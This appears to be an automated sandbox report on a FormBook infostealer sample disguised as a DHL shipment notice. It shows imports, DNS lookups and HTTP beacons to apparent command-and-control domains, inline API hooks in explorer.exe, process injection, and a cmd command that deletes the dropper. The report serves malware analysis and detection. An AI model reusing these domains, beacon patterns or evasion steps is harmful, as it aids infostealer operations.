Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b9000 | 0xa50 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x67c4 | 0x6800 | False | 0.675180288462 | data | 6.49518266675 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.14106681717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39ebb8 | 0x600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x3a9000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3b9000 | 0xa50 | 0xc00 | False | 0.401692708333 | data | 4.18753619353 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3b9190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x3b9478 | 0x100 | data | English | United States
RT_DIALOG | 0x3b9578 | 0x11c | data | English | United States
RT_DIALOG | 0x3b9698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3b96f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x3b9710 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Imports
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken
English | United States
TCP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 13, 2022 16:10:37.252978086 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.269717932 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.269814014 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.269937038 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.286659002 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.426731110 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.426786900 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.426815987 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.426949978 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.427006960 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.428131104 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.428225040 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.428282976 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.428313971 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:57.716248035 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.733297110 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.733407974 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.733571053 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.750320911 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.795728922 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.795795918 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.795835972 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.795855999 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.795876026 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.795908928 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.795924902 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.795937061 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.795967102 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.796086073 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.796102047 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.796107054 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.812993050 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.813087940 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:11:20.068773985 CEST | 49777 | 80 | 192.168.2.4 | 3.64.163.50
May 13, 2022 16:11:20.088573933 CEST | 80 | 49777 | 3.64.163.50 | 192.168.2.4
May 13, 2022 16:11:20.088706017 CEST | 49777 | 80 | 192.168.2.4 | 3.64.163.50
May 13, 2022 16:11:20.088871002 CEST | 49777 | 80 | 192.168.2.4 | 3.64.163.50
May 13, 2022 16:11:20.108211994 CEST | 80 | 49777 | 3.64.163.50 | 192.168.2.4
May 13, 2022 16:11:20.108275890 CEST | 80 | 49777 | 3.64.163.50 | 192.168.2.4
May 13, 2022 16:11:20.108305931 CEST | 80 | 49777 | 3.64.163.50 | 192.168.2.4
May 13, 2022 16:11:20.108448982 CEST | 49777 | 80 | 192.168.2.4 | 3.64.163.50
May 13, 2022 16:11:20.108520031 CEST | 49777 | 80 | 192.168.2.4 | 3.64.163.50
May 13, 2022 16:11:20.127751112 CEST | 80 | 49777 | 3.64.163.50 | 192.168.2.4
UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 13, 2022 16:10:37.212352991 CEST | 60647 | 53 | 192.168.2.4 | 8.8.8.8
May 13, 2022 16:10:37.247565985 CEST | 53 | 60647 | 8.8.8.8 | 192.168.2.4
May 13, 2022 16:10:57.684124947 CEST | 64909 | 53 | 192.168.2.4 | 8.8.8.8
May 13, 2022 16:10:57.714978933 CEST | 53 | 64909 | 8.8.8.8 | 192.168.2.4
May 13, 2022 16:11:20.044547081 CEST | 60381 | 53 | 192.168.2.4 | 8.8.8.8
May 13, 2022 16:11:20.067533016 CEST | 53 | 60381 | 8.8.8.8 | 192.168.2.4
DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 13, 2022 16:10:37.212352991 CEST | 192.168.2.4 | 8.8.8.8 | 0x190e | Standard query (0) | www.rtpholywin99.com | A (IP address) | IN (0x0001)
May 13, 2022 16:10:57.684124947 CEST | 192.168.2.4 | 8.8.8.8 | 0x2690 | Standard query (0) | www.keilaniclothing.com | A (IP address) | IN (0x0001)
May 13, 2022 16:11:20.044547081 CEST | 192.168.2.4 | 8.8.8.8 | 0xdfde | Standard query (0) | www.ultrakill.xyz | A (IP address) | IN (0x0001)
DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 13, 2022 16:10:37.247565985 CEST | 8.8.8.8 | 192.168.2.4 | 0x190e | No error (0) | www.rtpholywin99.com | ghs.google.com | | CNAME (Canonical name) | IN (0x0001)
May 13, 2022 16:10:37.247565985 CEST | 8.8.8.8 | 192.168.2.4 | 0x190e | No error (0) | ghs.google.com | | 142.250.185.115 | A (IP address) | IN (0x0001)
May 13, 2022 16:10:57.714978933 CEST | 8.8.8.8 | 192.168.2.4 | 0x2690 | No error (0) | www.keilaniclothing.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
May 13, 2022 16:10:57.714978933 CEST | 8.8.8.8 | 192.168.2.4 | 0x2690 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
May 13, 2022 16:11:20.067533016 CEST | 8.8.8.8 | 192.168.2.4 | 0xdfde | No error (0) | www.ultrakill.xyz | | 3.64.163.50 | A (IP address) | IN (0x0001)
                      • www.rtpholywin99.com
                      • www.keilaniclothing.com
                      • www.ultrakill.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49773 | 142.250.185.115 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 13, 2022 16:10:37.269937038 CEST | 9887 | OUT | GET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1
                      Host: www.rtpholywin99.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
May 13, 2022 16:10:37.426731110 CEST | 9888 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=UTF-8
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Fri, 13 May 2022 14:10:37 GMT
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Ascii: b12<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta name="description" content="Blogger is a blog publishing tool from Google for easily sharing your thoughts with the world. Blogger makes it simple to post text, photos and video onto your personal or team blog."> <meta name="keywords" content="blogger, blogspot, blog, blogger.com, blogspot.com, personal blog, weblog, create blog, new blog"><base href="https://www.blogger.com"><title>Page not found</title><style type="text/css"> #homeButton { width: 270px; } </style><link href="https://www.blogger.com/static/v1/v-css/3896558673-new_ui_static_pages.css" rel="stylesheet" type="text/css"></head><body class="lang_en rb"><script type="text/javascript"> window.ga=window.ga||function(){(ga.q=ga.q||[]).push(ar


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49775 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 13, 2022 16:10:57.733571053 CEST | 11587 | OUT | GET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1
                      Host: www.keilaniclothing.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
May 13, 2022 16:10:57.795728922 CEST | 11589 | IN | HTTP/1.1 403 Forbidden
                      Date: Fri, 13 May 2022 14:10:57 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      X-Sorting-Hat-PodId: 250
                      X-Sorting-Hat-ShopId: 64045383931
                      X-Dc: gcp-europe-west1
                      X-Request-ID: c795f513-2a89-4e29-a885-b65e0c1175bd
                      X-XSS-Protection: 1; mode=block
                      X-Download-Options: noopen
                      X-Content-Type-Options: nosniff
                      X-Permitted-Cross-Domain-Policies: none
                      CF-Cache-Status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 70abfb06ecb2917d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49777 | 3.64.163.50 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 13, 2022 16:11:20.088871002 CEST | 11599 | OUT | GET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1
                      Host: www.ultrakill.xyz
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
May 13, 2022 16:11:20.108275890 CEST | 11600 | IN | HTTP/1.1 410 Gone
                      Server: openresty
                      Date: Fri, 13 May 2022 14:11:20 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6c 74 72 61 6b 69 6c 6c 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='0; url=http://www.ultrakill.xyz/' />a </head>8</html>0


                      Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE6
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE6
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE6
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE6


                      Target ID:0
                      Start time:16:09:19
                      Start date:13/05/2022
                      Path:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe"
                      Imagebase:0x400000
                      File size:278331 bytes
                      MD5 hash:8FBDF9F70B21179D87B83FE47B2137DD
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Target ID:1
                      Start time:16:09:21
                      Start date:13/05/2022
                      Path:C:\Users\user\AppData\Local\Temp\aeokw.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                      Imagebase:0xd70000
                      File size:80384 bytes
                      MD5 hash:6F70881E0183CE9F78E300CF2C8DC48E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      Target ID:2
                      Start time:16:09:22
                      Start date:13/05/2022
                      Path:C:\Users\user\AppData\Local\Temp\aeokw.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                      Imagebase:0xd70000
                      File size:80384 bytes
                      MD5 hash:6F70881E0183CE9F78E300CF2C8DC48E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      Target ID:5
                      Start time:16:09:27
                      Start date:13/05/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f3b00000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      Target ID:17
                      Start time:16:09:51
                      Start date:13/05/2022
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\svchost.exe
                      Imagebase:0x2f0000
                      File size:44520 bytes
                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      Target ID:19
                      Start time:16:09:56
                      Start date:13/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
                      Imagebase:0x1190000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:20
                      Start time:16:09:57
                      Start date:13/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff647620000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      No disassembly